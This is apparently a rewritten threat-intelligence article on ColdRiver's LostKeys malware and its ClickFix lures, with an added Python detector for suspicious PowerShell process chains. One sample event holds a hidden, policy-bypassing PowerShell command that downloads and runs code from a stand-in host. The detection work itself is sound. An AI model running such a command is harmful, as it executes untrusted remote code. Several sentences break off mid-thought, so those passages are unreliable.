Inside Russia’s Digital Espionage: ColdRiver’s Use of LostKeys Malware to Breach Western Targets


Introduction

A new chapter in global cyber-espionage is unfolding as the Russian state-backed group ColdRiver runs a campaign built around a newly identified malware family dubbed "LostKeys." The malware has been deployed since the start of 2025 against high-profile Western targets, including government bodies, journalists, think tanks, and NGOs. As the geopolitical tension surrounding the war in Ukraine persists, the cyber front has stayed active, with ColdRiver operating as part of a broader Russian intelligence effort.

Attributed to the Russian Federal Security Service (FSB), the group does not operate in a vacuum: the ClickFix social-engineering technique behind this campaign is also used by threat groups from North Korea, Iran, and other Russian units. With a reliance on carefully targeted social engineering and custom malware, ColdRiver has become one of the most persistent espionage threats on the world stage. Here is a look at its latest activity, tactics, and what it means for defenders.

Key Developments on the ColdRiver Campaign


ColdRiver is a Russian state-sponsored cyber-espionage group.
In early 2025, it began using a new malware known as LostKeys.
Targets include Western government bodies, journalists, NGOs, and policy think tanks.
LostKeys is delivered through ClickFix social engineering campaigns.
ClickFix tricks victims into running malicious PowerShell commands themselves, typically by pasting them into a system dialog under the pretext of fixing an error or passing a verification check.
Those commands retrieve further stages and ultimately drop LostKeys.
LostKeys steals files from a hard-coded list of directories and file extensions.
It also sends system information and a list of running processes back to the attackers.
The malware marks an evolution in ColdRiver's espionage arsenal.
ColdRiver was publicly linked to Russia's FSB (Centre 18) by the UK and US in December 2023.
Google's Threat Intelligence Group (GTIG) tracked the LostKeys deployments.
GTIG emphasizes that LostKeys is deployed selectively, only against high-value targets.
ColdRiver has previously used another custom malware, SPICA, for similar missions.
Other nations' APT groups, including Kimsuky (North Korea), MuddyWater (Iran), and APT28 (Russia), also use ClickFix-style lures.
ColdRiver is also tracked as Star Blizzard, Callisto Group, and Seaborgium.
The group has been active since at least 2017 and uses OSINT to profile and select victims.
December 2023 saw coordinated warnings from Five Eyes nations.
These alerts cited
Its targeting widened after the invasion of Ukraine to include energy and defense infrastructure.
Microsoft disrupted ColdRiver's social engineering infrastructure in 2022.
That operation targeted credential and email harvesting against NATO-related organizations.
In December 2023, two ColdRiver members were sanctioned and indicted in the U.S.
One of them was confirmed as an FSB officer.
The U.S. now offers up to $10 million for information on ColdRiver members.
ColdRiver represents a deeply embedded espionage arm of Russian cyber operations.
GTIG's findings add insight into how nation-state tooling is evolving.
LostKeys reflects a growing emphasis on stealth and selective deployment.
Its narrow use against high-value targets suggests it is reserved to limit exposure of the tool.
ColdRiver's continued adaptation underscores the need for resilient defenses that do not depend on recognizing one malware family.
The international response signals increasing urgency in countering state-backed threats.

What Undercode Says:

The emergence of LostKeys is not merely an incremental change; it marks a strategic shift in how this group operates. ColdRiver's decision to use LostKeys only in selected intrusions suggests the tool is reserved for the highest-value intelligence collection, limiting the chance that samples reach defenders. The reliance on PowerShell and Visual Basic Script shows a clear preference for interpreters already present on every Windows host, so the chain leaves no unfamiliar binary on disk for signature-based antivirus to catch and instead hides among legitimate administrative activity. The defensive consequence is that detection has to rest on behavior: which process launched the interpreter, with what arguments, and what it spawned next.
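Because the value of a ClickFix chain to the attacker is that every component is a legitimate Windows interpreter, the practical detection is the process lineage rather than a file hash. The following Python detector is an added example, not code from GTIG, BleepingComputer, or this article. It runs over a constructed list of Sysmon-style process-creation events and flags two patterns: a shell launched directly from explorer.exe with hidden-window, no-profile, policy-bypass, encoded, or download-and-execute arguments (consistent with a user pasting a lure into the Run dialog, the usual ClickFix mechanic), and a script host running a .vbs from a user-writable path under that shell. The sample command lines, paths, hostnames, and the two-indicator threshold are assumptions for illustration, not observed LostKeys indicators.

```python
"""Flag ClickFix-style process chains in Sysmon-like process-creation events.

Added example. The events below are constructed; the heuristics are
assumptions chosen to illustrate lineage-based detection, not published IOCs.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the created process
    cmdline: str
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Windows-style basename that also works when run on a non-Windows host."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# One regex per indicator; the name is what ends up in the alert text.
ARG_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "download_and_run": re.compile(
        r"\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b",
        re.I | re.S),
}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\|\\temp\\|\\appdata\\", re.I)

# Constructed telemetry (assumed hostnames and paths, not real artefacts).
SAMPLE_EVENTS = [
    ProcEvent(4100, 3000, r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Windows\System32\winlogon.exe"),
    # Hidden, profile-less PowerShell launched straight from explorer.exe:
    # the ClickFix entry point (user pasted the lure into the Run dialog).
    ProcEvent(5200, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -nop -ep bypass -c "iex (iwr http://example.invalid/c).Content"',
              r"C:\Windows\explorer.exe"),
    # Second stage: a VBS dropped to Temp and run by that PowerShell.
    ProcEvent(5300, 5200, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\stage.vbs",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # Benign: admin running a script from a terminal, must not fire.
    ProcEvent(6000, 4500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\inventory.ps1",
              r"C:\Windows\System32\WindowsTerminal.exe"),
    # Benign: user opened PowerShell from the Start menu, no indicators, must not fire.
    ProcEvent(6100, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe", r"C:\Windows\explorer.exe"),
]


def score_command(cmdline: str) -> list[str]:
    """Return the names of every argument indicator present in the command line."""
    return [name for name, rx in ARG_INDICATORS.items() if rx.search(cmdline)]


def chain(e: ProcEvent, by_pid: dict[int, ProcEvent], max_depth: int = 8) -> str:
    """Walk ppid links to render the lineage root-first, e.g. 'explorer.exe > powershell.exe'."""
    names = [basename(e.image)]
    cur = e
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:                      # parent not in our event window
            names.append(basename(cur.parent_image))
            break
        names.append(basename(parent.image))
        cur = parent
    return " > ".join(reversed(names))


def detect(events: list[ProcEvent]) -> dict[int, dict]:
    """Map pid -> {'chain': lineage string, 'reasons': [...]} for suspicious events."""
    by_pid = {e.pid: e for e in events}
    hits: dict[int, dict] = {}
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        reasons = []
        if img in SHELLS and parent == "explorer.exe":
            indicators = score_command(e.cmdline)
            if len(indicators) >= 2:            # threshold is an assumption; tune per estate
                reasons.append("run-dialog shell with indicators: " + ", ".join(indicators))
        if img in SCRIPT_HOSTS and parent in SHELLS and USER_WRITABLE.search(e.cmdline):
            reasons.append("script host running a script from a user-writable path under a shell")
        if reasons:
            hits[e.pid] = {"chain": chain(e, by_pid), "reasons": reasons}
    return hits


if __name__ == "__main__":
    for pid, hit in detect(SAMPLE_EVENTS).items():
        print(pid, hit["chain"], "|", "; ".join(hit["reasons"]))
```

On a real estate the events would come from Sysmon Event ID 1 or Security 4688 with command-line auditing enabled; the lineage check is what separates a pasted lure from the same interpreter started by an administrator, and the threshold keeps a bare interactive PowerShell from alerting.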

What’s notable is the pattern of behavior aligning with ColdRiver’s historic operational fingerprint. Their use of OSINT and social engineering in ClickFix campaigns reveals a meticulous approach to reconnaissance—victims are not randomly selected but carefully profiled. This level of preparation is a hallmark of professional intelligence operations, underscoring that ColdRiver operates more like a covert agency than a rogue hacker collective.

LostKeys appears to supplement existing tools like SPICA, suggesting ColdRiver has developed a modular toolkit of malware. These tools can be deployed interchangeably based on the target’s defense profile and the intelligence value of their data. This modularity improves operational flexibility and reduces the risk of detection from over-reliance on a single strain of malware.

The involvement of multiple nation-state groups—North

On a broader level, ColdRiver’s renewed activity, especially against the backdrop of the Ukraine conflict, highlights the blurred lines between conventional warfare and cyberwarfare. Infiltrating NGOs, defense contractors, and government organizations doesn’t just yield sensitive documents—it can influence foreign policy, disrupt supply chains, and even manipulate

References:

Reported By: www.bleepingcomputer.com